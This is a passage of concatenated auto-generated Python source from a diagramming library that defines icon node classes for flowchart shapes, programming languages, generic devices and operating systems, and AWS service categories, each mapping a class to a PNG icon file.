class PredefinedProcess(_Flowchart): _icon = "predefined-process.png" class Preparation(_Flowchart): _icon = "preparation.png" class Sort(_Flowchart): _icon = "sort.png" class StartEnd(_Flowchart): _icon = "start-end.png" class StoredData(_Flowchart): _icon = "stored-data.png" class SummingJunction(_Flowchart): _icon = "summing-junction.png" # Aliases File: diagrams/programming/runtime.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Runtime(_Programming): _type = "runtime" _icon_dir = "resources/programming/runtime" class Dapr(_Runtime): _icon = "dapr.png" # Aliases File: diagrams/programming/language.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Language(_Programming): _type = "language" _icon_dir = "resources/programming/language" class Bash(_Language): _icon = "bash.png" class C(_Language): _icon = "c.png" class Cpp(_Language): _icon = "cpp.png" class Csharp(_Language): _icon = "csharp.png" class Dart(_Language): _icon = "dart.png" class Elixir(_Language): _icon = "elixir.png" class Erlang(_Language): _icon = "erlang.png" class Go(_Language): _icon = "go.png" class Java(_Language): _icon = "java.png" class Javascript(_Language): _icon = "javascript.png" class Kotlin(_Language): _icon = "kotlin.png" class Latex(_Language): _icon = "latex.png" class Matlab(_Language): _icon = "matlab.png" class Nodejs(_Language): _icon = "nodejs.png" class Php(_Language): _icon = "php.png" class Python(_Language): _icon = "python.png" class R(_Language): _icon = "r.png" class Ruby(_Language): _icon = "ruby.png" class Rust(_Language): _icon = "rust.png" class Scala(_Language): _icon = "scala.png" class Swift(_Language): _icon = "swift.png" class Typescript(_Language): _icon = "typescript.png" # Aliases JavaScript = Javascript NodeJS = Nodejs PHP = Php TypeScript = Typescript File: diagrams/generic/place.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Place(_Generic): _type = "place" _icon_dir = "resources/generic/place" class Datacenter(_Place): _icon = "datacenter.png" # Aliases File: diagrams/generic/device.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Device(_Generic): _type = "device" _icon_dir = "resources/generic/device" class Mobile(_Device): _icon = "mobile.png" class Tablet(_Device): _icon = "tablet.png" # Aliases File: diagrams/generic/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Database(_Generic): _type = "database" _icon_dir = "resources/generic/database" class SQL(_Database): _icon = "sql.png" # Aliases File: diagrams/generic/os.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Os(_Generic): _type = "os" _icon_dir = "resources/generic/os" class Android(_Os): _icon = "android.png" class Centos(_Os): _icon = "centos.png" class Debian(_Os): _icon = "debian.png" class IOS(_Os): _icon = "ios.png" class LinuxGeneral(_Os): _icon = "linux-general.png" class Raspbian(_Os): _icon = "raspbian.png" class RedHat(_Os): _icon = "red-hat.png" class Suse(_Os): _icon = "suse.png" class Ubuntu(_Os): _icon = "ubuntu.png" class Windows(_Os): _icon = "windows.png" # Aliases File: diagrams/generic/virtualization.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Virtualization(_Generic): _type = "virtualization" _icon_dir = "resources/generic/virtualization" class Qemu(_Virtualization): _icon = "qemu.png" class Virtualbox(_Virtualization): _icon = "virtualbox.png" class Vmware(_Virtualization): _icon = "vmware.png" class XEN(_Virtualization): _icon = "xen.png" # Aliases File: diagrams/generic/__init__.py """ Generic provides the possibility of load an image to be presented as a node. """ from diagrams import Node class _Generic(Node): provider = "generic" _icon_dir = "resources/generic" fontcolor = "#ffffff" File: diagrams/generic/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Storage(_Generic): _type = "storage" _icon_dir = "resources/generic/storage" class Storage(_Storage): _icon = "storage.png" # Aliases File: diagrams/generic/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Network(_Generic): _type = "network" _icon_dir = "resources/generic/network" class Firewall(_Network): _icon = "firewall.png" class Router(_Network): _icon = "router.png" class Subnet(_Network): _icon = "subnet.png" class Switch(_Network): _icon = "switch.png" class VPN(_Network): _icon = "vpn.png" # Aliases File: diagrams/generic/blank.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Blank(_Generic): _type = "blank" _icon_dir = "resources/generic/blank" class Blank(_Blank): _icon = "blank.png" # Aliases File: diagrams/generic/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Compute(_Generic): _type = "compute" _icon_dir = "resources/generic/compute" class Rack(_Compute): _icon = "rack.png" # Aliases File: diagrams/aws/enablement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Enablement(_AWS): _type = "enablement" _icon_dir = "resources/aws/enablement" class CustomerEnablement(_Enablement): _icon = "customer-enablement.png" class Iq(_Enablement): _icon = "iq.png" class ManagedServices(_Enablement): _icon = "managed-services.png" class ProfessionalServices(_Enablement): _icon = "professional-services.png" class Support(_Enablement): _icon = "support.png" # Aliases File: diagrams/aws/media.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Media(_AWS): _type = "media" _icon_dir = "resources/aws/media" class ElasticTranscoder(_Media): _icon = "elastic-transcoder.png" class ElementalConductor(_Media): _icon = "elemental-conductor.png" class ElementalDelta(_Media): _icon = "elemental-delta.png" class ElementalLive(_Media): _icon = "elemental-live.png" class ElementalMediaconnect(_Media): _icon = "elemental-mediaconnect.png" class ElementalMediaconvert(_Media): _icon = "elemental-mediaconvert.png" class ElementalMedialive(_Media): _icon = "elemental-medialive.png" class ElementalMediapackage(_Media): _icon = "elemental-mediapackage.png" class ElementalMediastore(_Media): _icon = "elemental-mediastore.png" class ElementalMediatailor(_Media): _icon = "elemental-mediatailor.png" class ElementalServer(_Media): _icon = "elemental-server.png" class KinesisVideoStreams(_Media): _icon = "kinesis-video-streams.png" class MediaServices(_Media): _icon = "media-services.png" # Aliases File: diagrams/aws/enduser.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Enduser(_AWS): _type = "enduser" _icon_dir = "resources/aws/enduser" class Appstream20(_Enduser): _icon = "appstream-2-0.png" class DesktopAndAppStreaming(_Enduser): _icon = "desktop-and-app-streaming.png" class Workdocs(_Enduser): _icon = "workdocs.png" class Worklink(_Enduser): _icon = "worklink.png" class Workspaces(_Enduser): _icon = "workspaces.png" # Aliases File: diagrams/aws/game.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Game(_AWS): _type = "game" _icon_dir = "resources/aws/game" class GameTech(_Game): _icon = "game-tech.png" class Gamelift(_Game): _icon = "gamelift.png" # Aliases File: diagrams/aws/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Database(_AWS): _type = "database" _icon_dir = "resources/aws/database" class AuroraInstance(_Database): _icon = "aurora-instance.png" class Aurora(_Database): _icon = "aurora.png" class DatabaseMigrationServiceDatabaseMigrationWorkflow(_Database): _icon = "database-migration-service-database-migration-workflow.png" class DatabaseMigrationService(_Database): _icon = "database-migration-service.png" class Database(_Database): _icon = "database.png" class DocumentdbMongodbCompatibility(_Database): _icon = "documentdb-mongodb-compatibility.png" class DynamodbAttribute(_Database): _icon = "dynamodb-attribute.png" class DynamodbAttributes(_Database): _icon = "dynamodb-attributes.png" class DynamodbDax(_Database): _icon = "dynamodb-dax.png" class DynamodbGlobalSecondaryIndex(_Database): _icon = "dynamodb-global-secondary-index.png" class DynamodbItem(_Database): _icon = "dynamodb-item.png" class DynamodbItems(_Database): _icon = "dynamodb-items.png" class DynamodbTable(_Database): _icon = "dynamodb-table.png" class Dynamodb(_Database): _icon = "dynamodb.png" class ElasticacheCacheNode(_Database): _icon = "elasticache-cache-node.png" class ElasticacheForMemcached(_Database): _icon = "elasticache-for-memcached.png" class ElasticacheForRedis(_Database): _icon = "elasticache-for-redis.png" class Elasticache(_Database): _icon = "elasticache.png" class KeyspacesManagedApacheCassandraService(_Database): _icon = "keyspaces-managed-apache-cassandra-service.png" class Neptune(_Database): _icon = "neptune.png" class QuantumLedgerDatabaseQldb(_Database): _icon = "quantum-ledger-database-qldb.png" class RDSInstance(_Database): _icon = "rds-instance.png" class RDSMariadbInstance(_Database): _icon = "rds-mariadb-instance.png" class RDSMysqlInstance(_Database): _icon = "rds-mysql-instance.png" class RDSOnVmware(_Database): _icon = "rds-on-vmware.png" class RDSOracleInstance(_Database): _icon = "rds-oracle-instance.png" class RDSPostgresqlInstance(_Database): _icon = "rds-postgresql-instance.png" class RDSSqlServerInstance(_Database): _icon = "rds-sql-server-instance.png" class RDS(_Database): _icon = "rds.png" class RedshiftDenseComputeNode(_Database): _icon = "redshift-dense-compute-node.png" class RedshiftDenseStorageNode(_Database): _icon = "redshift-dense-storage-node.png" class Redshift(_Database): _icon = "redshift.png" class Timestream(_Database): _icon = "timestream.png" # Aliases DMS = DatabaseMigrationService DocumentDB = DocumentdbMongodbCompatibility DAX = DynamodbDax DynamodbGSI = DynamodbGlobalSecondaryIndex DB = Database DDB = Dynamodb ElastiCache = Elasticache QLDB = QuantumLedgerDatabaseQldb File: diagrams/aws/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Security(_AWS): _type = "security" _icon_dir = "resources/aws/security" class AdConnector(_Security): _icon = "ad-connector.png" class Artifact(_Security): _icon = "artifact.png" class CertificateAuthority(_Security): _icon = "certificate-authority.png" class CertificateManager(_Security): _icon = "certificate-manager.png" class CloudDirectory(_Security): _icon = "cloud-directory.png" class Cloudhsm(_Security): _icon = "cloudhsm.png" class Cognito(_Security): _icon = "cognito.png" class Detective(_Security): _icon = "detective.png" class DirectoryService(_Security): _icon = "directory-service.png" class FirewallManager(_Security): _icon = "firewall-manager.png" class Guardduty(_Security): _icon = "guardduty.png" class IdentityAndAccessManagementIamAccessAnalyzer(_Security): _icon = "identity-and-access-management-iam-access-analyzer.png" class IdentityAndAccessManagementIamAddOn(_Security): _icon = "identity-and-access-management-iam-add-on.png" class IdentityAndAccessManagementIamAWSStsAlternate(_Security): _icon = "identity-and-access-management-iam-aws-sts-alternate.png" class IdentityAndAccessManagementIamAWSSts(_Security): _icon = "identity-and-access-management-iam-aws-sts.png" class IdentityAndAccessManagementIamDataEncryptionKey(_Security): _icon = "identity-and-access-management-iam-data-encryption-key.png" class IdentityAndAccessManagementIamEncryptedData(_Security): _icon = "identity-and-access-management-iam-encrypted-data.png" class IdentityAndAccessManagementIamLongTermSecurityCredential(_Security): _icon = "identity-and-access-management-iam-long-term-security-credential.png" class IdentityAndAccessManagementIamMfaToken(_Security): _icon = "identity-and-access-management-iam-mfa-token.png" class IdentityAndAccessManagementIamPermissions(_Security): _icon = "identity-and-access-management-iam-permissions.png" class IdentityAndAccessManagementIamRole(_Security): _icon = "identity-and-access-management-iam-role.png" class IdentityAndAccessManagementIamTemporarySecurityCredential(_Security): _icon = "identity-and-access-management-iam-temporary-security-credential.png" class IdentityAndAccessManagementIam(_Security): _icon = "identity-and-access-management-iam.png" class InspectorAgent(_Security): _icon = "inspector-agent.png" class Inspector(_Security): _icon = "inspector.png" class KeyManagementService(_Security): _icon = "key-management-service.png" class Macie(_Security): _icon = "macie.png" class ManagedMicrosoftAd(_Security): _icon = "managed-microsoft-ad.png" class ResourceAccessManager(_Security): _icon = "resource-access-manager.png" class SecretsManager(_Security): _icon = "secrets-manager.png" class SecurityHubFinding(_Security): _icon = "security-hub-finding.png" class SecurityHub(_Security): _icon = "security-hub.png" class SecurityIdentityAndCompliance(_Security): _icon = "security-identity-and-compliance.png" class ShieldAdvanced(_Security): _icon = "shield-advanced.png" class Shield(_Security): _icon = "shield.png" class SimpleAd(_Security): _icon = "simple-ad.png" class SingleSignOn(_Security): _icon = "single-sign-on.png" class WAFFilteringRule(_Security): _icon = "waf-filtering-rule.png" class WAF(_Security): _icon = "waf.png" # Aliases ACM = CertificateManager CloudHSM = Cloudhsm DS = DirectoryService FMS = FirewallManager IAMAccessAnalyzer = IdentityAndAccessManagementIamAccessAnalyzer IAMAWSSts = IdentityAndAccessManagementIamAWSSts IAMPermissions = IdentityAndAccessManagementIamPermissions IAMRole = IdentityAndAccessManagementIamRole IAM = IdentityAndAccessManagementIam KMS = KeyManagementService RAM = ResourceAccessManager File: diagrams/aws/satellite.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Satellite(_AWS): _type = "satellite" _icon_dir = "resources/aws/satellite" class GroundStation(_Satellite): _icon = "ground-station.png" class Satellite(_Satellite): _icon = "satellite.png" # Aliases File: diagrams/aws/mobile.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Mobile(_AWS): _type = "mobile" _icon_dir = "resources/aws/mobile" class Amplify(_Mobile): _icon = "amplify.png" class APIGatewayEndpoint(_Mobile): _icon = "api-gateway-endpoint.png" class APIGateway(_Mobile): _icon = "api-gateway.png" class Appsync(_Mobile): _icon = "appsync.png" class DeviceFarm(_Mobile): _icon = "device-farm.png" class Mobile(_Mobile): _icon = "mobile.png" class Pinpoint(_Mobile): _icon = "pinpoint.png" # Aliases File: diagrams/aws/robotics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Robotics(_AWS): _type = "robotics" _icon_dir = "resources/aws/robotics" class RobomakerCloudExtensionRos(_Robotics): _icon = "robomaker-cloud-extension-ros.png" class RobomakerDevelopmentEnvironment(_Robotics): _icon = "robomaker-development-environment.png" class RobomakerFleetManagement(_Robotics): _icon = "robomaker-fleet-management.png" class RobomakerSimulator(_Robotics): _icon = "robomaker-simulator.png" class Robomaker(_Robotics): _icon = "robomaker.png" class Robotics(_Robotics): _icon = "robotics.png" # Aliases File: diagrams/aws/__init__.py """ AWS provides a set of services for Amazon Web Service provider. """ from diagrams import Node class _AWS(Node): _provider = "aws" _icon_dir = "resources/aws" fontcolor = "#ffffff" File: diagrams/aws/integration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Integration(_AWS): _type = "integration" _icon_dir = "resources/aws/integration" class ApplicationIntegration(_Integration): _icon = "application-integration.png" class Appsync(_Integration): _icon = "appsync.png" class ConsoleMobileApplication(_Integration): _icon = "console-mobile-application.png" class EventResource(_Integration): _icon = "event-resource.png" class EventbridgeCustomEventBusResource(_Integration): _icon = "eventbridge-custom-event-bus-resource.png" class EventbridgeDefaultEventBusResource(_Integration): _icon = "eventbridge-default-event-bus-resource.png" class EventbridgeSaasPartnerEventBusResource(_Integration): _icon = "eventbridge-saas-partner-event-bus-resource.png" class Eventbridge(_Integration): _icon = "eventbridge.png" class ExpressWorkflows(_Integration): _icon = "express-workflows.png" class MQ(_Integration): _icon = "mq.png" class SimpleNotificationServiceSnsEmailNotification(_Integration): _icon = "simple-notification-service-sns-email-notification.png" class SimpleNotificationServiceSnsHttpNotification(_Integration): _icon = "simple-notification-service-sns-http-notification.png" class SimpleNotificationServiceSnsTopic(_Integration): _icon = "simple-notification-service-sns-topic.png" class SimpleNotificationServiceSns(_Integration): _icon = "simple-notification-service-sns.png" class SimpleQueueServiceSqsMessage(_Integration): _icon = "simple-queue-service-sqs-message.png" class SimpleQueueServiceSqsQueue(_Integration): _icon = "simple-queue-service-sqs-queue.png" class SimpleQueueServiceSqs(_Integration): _icon = "simple-queue-service-sqs.png" class StepFunctions(_Integration): _icon = "step-functions.png" # Aliases SNS = SimpleNotificationServiceSns SQS = SimpleQueueServiceSqs SF = StepFunctions File: diagrams/aws/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _ML(_AWS): _type = "ml" _icon_dir = "resources/aws/ml" class ApacheMxnetOnAWS(_ML): _icon = "apache-mxnet-on-aws.png" class AugmentedAi(_ML): _icon = "augmented-ai.png" class Comprehend(_ML): _icon = "comprehend.png" class DeepLearningAmis(_ML): _icon = "deep-learning-amis.png" class DeepLearningContainers(_ML): _icon = "deep-learning-containers.png" class Deepcomposer(_ML): _icon = "deepcomposer.png" class Deeplens(_ML): _icon = "deeplens.png" class Deepracer(_ML): _icon = "deepracer.png" class ElasticInference(_ML): _icon = "elastic-inference.png" class Forecast(_ML): _icon = "forecast.png" class FraudDetector(_ML): _icon = "fraud-detector.png" class Kendra(_ML): _icon = "kendra.png" class Lex(_ML): _icon = "lex.png" class MachineLearning(_ML): _icon = "machine-learning.png" class Personalize(_ML): _icon = "personalize.png" class Polly(_ML): _icon = "polly.png" class RekognitionImage(_ML): _icon = "rekognition-image.png" class RekognitionVideo(_ML): _icon = "rekognition-video.png" class Rekognition(_ML): _icon = "rekognition.png" class SagemakerGroundTruth(_ML): _icon = "sagemaker-ground-truth.png" class SagemakerModel(_ML): _icon = "sagemaker-model.png" class SagemakerNotebook(_ML): _icon = "sagemaker-notebook.png" class SagemakerTrainingJob(_ML): _icon = "sagemaker-training-job.png" class Sagemaker(_ML): _icon = "sagemaker.png" class TensorflowOnAWS(_ML): _icon = "tensorflow-on-aws.png" class Textract(_ML): _icon = "textract.png" class Transcribe(_ML): _icon = "transcribe.png" class Translate(_ML): _icon = "translate.png" # Aliases DLC = DeepLearningContainers File: diagrams/aws/devtools.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Devtools(_AWS): _type = "devtools" _icon_dir = "resources/aws/devtools" class CloudDevelopmentKit(_Devtools): _icon = "cloud-development-kit.png" class Cloud9Resource(_Devtools): _icon = "cloud9-resource.png" class Cloud9(_Devtools): _icon = "cloud9.png" class Codebuild(_Devtools): _icon = "codebuild.png" class Codecommit(_Devtools): _icon = "codecommit.png" class Codedeploy(_Devtools): _icon = "codedeploy.png" class Codepipeline(_Devtools): _icon = "codepipeline.png" class Codestar(_Devtools): _icon = "codestar.png" class CommandLineInterface(_Devtools): _icon = "command-line-interface.png" class DeveloperTools(_Devtools): _icon = "developer-tools.png" class ToolsAndSdks(_Devtools): _icon = "tools-and-sdks.png" class XRay(_Devtools): _icon = "x-ray.png" # Aliases CLI = CommandLineInterface DevTools = DeveloperTools File: diagrams/aws/business.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Business(_AWS): _type = "business" _icon_dir = "resources/aws/business" class AlexaForBusiness(_Business): _icon = "alexa-for-business.png" class BusinessApplications(_Business): _icon = "business-applications.png" class Chime(_Business): _icon = "chime.png" class Workmail(_Business): _icon = "workmail.png" # Aliases A4B = AlexaForBusiness File: diagrams/aws/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Storage(_AWS): _type = "storage" _icon_dir = "resources/aws/storage" class Backup(_Storage): _icon = "backup.png" class CloudendureDisasterRecovery(_Storage): _icon = "cloudendure-disaster-recovery.png" class EFSInfrequentaccessPrimaryBg(_Storage): _icon = "efs-infrequentaccess-primary-bg.png" class EFSStandardPrimaryBg(_Storage): _icon = "efs-standard-primary-bg.png" class ElasticBlockStoreEBSSnapshot(_Storage): _icon = "elastic-block-store-ebs-snapshot.png" class ElasticBlockStoreEBSVolume(_Storage): _icon = "elastic-block-store-ebs-volume.png" class ElasticBlockStoreEBS(_Storage): _icon = "elastic-block-store-ebs.png" class ElasticFileSystemEFSFileSystem(_Storage): _icon = "elastic-file-system-efs-file-system.png" class ElasticFileSystemEFS(_Storage): _icon = "elastic-file-system-efs.png" class FsxForLustre(_Storage): _icon = "fsx-for-lustre.png" class FsxForWindowsFileServer(_Storage): _icon = "fsx-for-windows-file-server.png" class Fsx(_Storage): _icon = "fsx.png" class MultipleVolumesResource(_Storage): _icon = "multiple-volumes-resource.png" class S3GlacierArchive(_Storage): _icon = "s3-glacier-archive.png" class S3GlacierVault(_Storage): _icon = "s3-glacier-vault.png" class S3Glacier(_Storage): _icon = "s3-glacier.png" class SimpleStorageServiceS3BucketWithObjects(_Storage): _icon = "simple-storage-service-s3-bucket-with-objects.png" class SimpleStorageServiceS3Bucket(_Storage): _icon = "simple-storage-service-s3-bucket.png" class SimpleStorageServiceS3Object(_Storage): _icon = "simple-storage-service-s3-object.png" class SimpleStorageServiceS3(_Storage): _icon = "simple-storage-service-s3.png" class SnowFamilySnowballImportExport(_Storage): _icon = "snow-family-snowball-import-export.png" class SnowballEdge(_Storage): _icon = "snowball-edge.png" class Snowball(_Storage): _icon = "snowball.png" class Snowmobile(_Storage): _icon = "snowmobile.png" class StorageGatewayCachedVolume(_Storage): _icon = "storage-gateway-cached-volume.png" class StorageGatewayNonCachedVolume(_Storage): _icon = "storage-gateway-non-cached-volume.png" class StorageGatewayVirtualTapeLibrary(_Storage): _icon = "storage-gateway-virtual-tape-library.png" class StorageGateway(_Storage): _icon = "storage-gateway.png" class Storage(_Storage): _icon = "storage.png" # Aliases CDR = CloudendureDisasterRecovery EBS = ElasticBlockStoreEBS EFS = ElasticFileSystemEFS FSx = Fsx S3 = SimpleStorageServiceS3 File: diagrams/aws/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Network(_AWS): _type = "network" _icon_dir = "resources/aws/network" class APIGatewayEndpoint(_Network): _icon = "api-gateway-endpoint.png" class APIGateway(_Network): _icon = "api-gateway.png" class AppMesh(_Network): _icon = "app-mesh.png" class ClientVpn(_Network): _icon = "client-vpn.png" class CloudMap(_Network): _icon = "cloud-map.png" class CloudFrontDownloadDistribution(_Network): _icon = "cloudfront-download-distribution.png" class CloudFrontEdgeLocation(_Network): _icon = "cloudfront-edge-location.png" class CloudFrontStreamingDistribution(_Network): _icon = "cloudfront-streaming-distribution.png" class CloudFront(_Network): _icon = "cloudfront.png" class DirectConnect(_Network): _icon = "direct-connect.png" class ElasticLoadBalancing(_Network): _icon = "elastic-load-balancing.png" class ElbApplicationLoadBalancer(_Network): _icon = "elb-application-load-balancer.png" class ElbClassicLoadBalancer(_Network): _icon = "elb-classic-load-balancer.png" class ElbNetworkLoadBalancer(_Network): _icon = "elb-network-load-balancer.png" class Endpoint(_Network): _icon = "endpoint.png" class GlobalAccelerator(_Network): _icon = "global-accelerator.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class Nacl(_Network): _icon = "nacl.png" class NATGateway(_Network): _icon = "nat-gateway.png" class NetworkingAndContentDelivery(_Network): _icon = "networking-and-content-delivery.png" class PrivateSubnet(_Network): _icon = "private-subnet.png" class Privatelink(_Network): _icon = "privatelink.png" class PublicSubnet(_Network): _icon = "public-subnet.png" class Route53HostedZone(_Network): _icon = "route-53-hosted-zone.png" class Route53(_Network): _icon = "route-53.png" class RouteTable(_Network): _icon = "route-table.png" class SiteToSiteVpn(_Network): _icon = "site-to-site-vpn.png" class TransitGateway(_Network): _icon = "transit-gateway.png" class VPCCustomerGateway(_Network): _icon = "vpc-customer-gateway.png" class VPCElasticNetworkAdapter(_Network): _icon = "vpc-elastic-network-adapter.png" class VPCElasticNetworkInterface(_Network): _icon = "vpc-elastic-network-interface.png" class VPCFlowLogs(_Network): _icon = "vpc-flow-logs.png" class VPCPeering(_Network): _icon = "vpc-peering.png" class VPCRouter(_Network): _icon = "vpc-router.png" class VPCTrafficMirroring(_Network): _icon = "vpc-traffic-mirroring.png" class VPC(_Network): _icon = "vpc.png" class VpnConnection(_Network): _icon = "vpn-connection.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" # Aliases CF = CloudFront ELB = ElasticLoadBalancing ALB = ElbApplicationLoadBalancer CLB = ElbClassicLoadBalancer NLB = ElbNetworkLoadBalancer GAX = GlobalAccelerator File: diagrams/aws/management.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Management(_AWS): _type = "management" _icon_dir = "resources/aws/management" class AutoScaling(_Management): _icon = "auto-scaling.png" class Chatbot(_Management): _icon = "chatbot.png" class CloudformationChangeSet(_Management): _icon = "cloudformation-change-set.png" class CloudformationStack(_Management): _icon = "cloudformation-stack.png" class CloudformationTemplate(_Management): _icon = "cloudformation-template.png" class Cloudformation(_Management): _icon = "cloudformation.png" class Cloudtrail(_Management): _icon = "cloudtrail.png" class CloudwatchAlarm(_Management): _icon = "cloudwatch-alarm.png" class CloudwatchEventEventBased(_Management): _icon = "cloudwatch-event-event-based.png" class CloudwatchEventTimeBased(_Management): _icon = "cloudwatch-event-time-based.png" class CloudwatchRule(_Management): _icon = "cloudwatch-rule.png" class Cloudwatch(_Management): _icon = "cloudwatch.png" class Codeguru(_Management): _icon = "codeguru.png" class CommandLineInterface(_Management): _icon = "command-line-interface.png" class Config(_Management): _icon = "config.png" class ControlTower(_Management): _icon = "control-tower.png" class LicenseManager(_Management): _icon = "license-manager.png" class ManagedServices(_Management): _icon = "managed-services.png" class ManagementAndGovernance(_Management): _icon = "management-and-governance.png" class ManagementConsole(_Management): _icon = "management-console.png" class OpsworksApps(_Management): _icon = "opsworks-apps.png" class OpsworksDeployments(_Management): _icon = "opsworks-deployments.png" class OpsworksInstances(_Management): _icon = "opsworks-instances.png" class OpsworksLayers(_Management): _icon = "opsworks-layers.png" class OpsworksMonitoring(_Management): _icon = "opsworks-monitoring.png" class OpsworksPermissions(_Management): _icon = "opsworks-permissions.png" class OpsworksResources(_Management): _icon = "opsworks-resources.png" class OpsworksStack(_Management): _icon = "opsworks-stack.png" class Opsworks(_Management): _icon = "opsworks.png" class OrganizationsAccount(_Management): _icon = "organizations-account.png" class OrganizationsOrganizationalUnit(_Management): _icon = "organizations-organizational-unit.png" class Organizations(_Management): _icon = "organizations.png" class PersonalHealthDashboard(_Management): _icon = "personal-health-dashboard.png" class ServiceCatalog(_Management): _icon = "service-catalog.png" class SystemsManagerAutomation(_Management): _icon = "systems-manager-automation.png" class SystemsManagerDocuments(_Management): _icon = "systems-manager-documents.png" class SystemsManagerInventory(_Management): _icon = "systems-manager-inventory.png" class SystemsManagerMaintenanceWindows(_Management): _icon = "systems-manager-maintenance-windows.png" class SystemsManagerOpscenter(_Management): _icon = "systems-manager-opscenter.png" class SystemsManagerParameterStore(_Management): _icon = "systems-manager-parameter-store.png" class SystemsManagerPatchManager(_Management): _icon = "systems-manager-patch-manager.png" class SystemsManagerRunCommand(_Management): _icon = "systems-manager-run-command.png" class SystemsManagerStateManager(_Management): _icon = "systems-manager-state-manager.png" class SystemsManager(_Management): _icon = "systems-manager.png" class TrustedAdvisorChecklistCost(_Management): _icon = "trusted-advisor-checklist-cost.png" class TrustedAdvisorChecklistFaultTolerant(_Management): _icon = "trusted-advisor-checklist-fault-tolerant.png" class TrustedAdvisorChecklistPerformance(_Management): _icon = "trusted-advisor-checklist-performance.png" class TrustedAdvisorChecklistSecurity(_Management): _icon = "trusted-advisor-checklist-security.png" class TrustedAdvisorChecklist(_Management): _icon = "trusted-advisor-checklist.png" class TrustedAdvisor(_Management): _icon = "trusted-advisor.png" class WellArchitectedTool(_Management): _icon = "well-architected-tool.png" # Aliases SSM = SystemsManager ParameterStore = SystemsManagerParameterStore File: diagrams/aws/ar.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Ar(_AWS): _type = "ar" _icon_dir = "resources/aws/ar" class ArVr(_Ar): _icon = "ar-vr.png" class Sumerian(_Ar): _icon = "sumerian.png" # Aliases File: diagrams/aws/blockchain.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Blockchain(_AWS): _type = "blockchain" _icon_dir = "resources/aws/blockchain" class BlockchainResource(_Blockchain): _icon = "blockchain-resource.png" class Blockchain(_Blockchain): _icon = "blockchain.png" class ManagedBlockchain(_Blockchain): _icon = "managed-blockchain.png" class QuantumLedgerDatabaseQldb(_Blockchain): _icon = "quantum-ledger-database-qldb.png" # Aliases QLDB = QuantumLedgerDatabaseQldb File: diagrams/aws/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Analytics(_AWS): _type = "analytics" _icon_dir = "resources/aws/analytics" class Analytics(_Analytics): _icon = "analytics.png" class Athena(_Analytics): _icon = "athena.png" class CloudsearchSearchDocuments(_Analytics): _icon = "cloudsearch-search-documents.png" class Cloudsearch(_Analytics): _icon = "cloudsearch.png" class DataLakeResource(_Analytics): _icon = "data-lake-resource.png" class DataPipeline(_Analytics): _icon = "data-pipeline.png" class ElasticsearchService(_Analytics): _icon = "elasticsearch-service.png" class EMRCluster(_Analytics): _icon = "emr-cluster.png" class EMREngineMaprM3(_Analytics): _icon = "emr-engine-mapr-m3.png" class EMREngineMaprM5(_Analytics): _icon = "emr-engine-mapr-m5.png" class EMREngineMaprM7(_Analytics): _icon = "emr-engine-mapr-m7.png" class EMREngine(_Analytics): _icon = "emr-engine.png" class EMRHdfsCluster(_Analytics): _icon = "emr-hdfs-cluster.png" class EMR(_Analytics): _icon = "emr.png" class GlueCrawlers(_Analytics): _icon = "glue-crawlers.png" class GlueDataCatalog(_Analytics): _icon = "glue-data-catalog.png" class Glue(_Analytics): _icon = "glue.png" class KinesisDataAnalytics(_Analytics): _icon = "kinesis-data-analytics.png" class KinesisDataFirehose(_Analytics): _icon = "kinesis-data-firehose.png" class KinesisDataStreams(_Analytics): _icon = "kinesis-data-streams.png" class KinesisVideoStreams(_Analytics): _icon = "kinesis-video-streams.png" class Kinesis(_Analytics): _icon = "kinesis.png" class LakeFormation(_Analytics): _icon = "lake-formation.png" class ManagedStreamingForKafka(_Analytics): _icon = "managed-streaming-for-kafka.png" class Quicksight(_Analytics): _icon = "quicksight.png" class RedshiftDenseComputeNode(_Analytics): _icon = "redshift-dense-compute-node.png" class RedshiftDenseStorageNode(_Analytics): _icon = "redshift-dense-storage-node.png" class Redshift(_Analytics): _icon = "redshift.png" # Aliases ES = ElasticsearchService File: diagrams/aws/quantum.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Quantum(_AWS): _type = "quantum" _icon_dir = "resources/aws/quantum" class Braket(_Quantum): _icon = "braket.png" class QuantumTechnologies(_Quantum): _icon = "quantum-technologies.png" # Aliases File: diagrams/aws/cost.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Cost(_AWS): _type = "cost" _icon_dir = 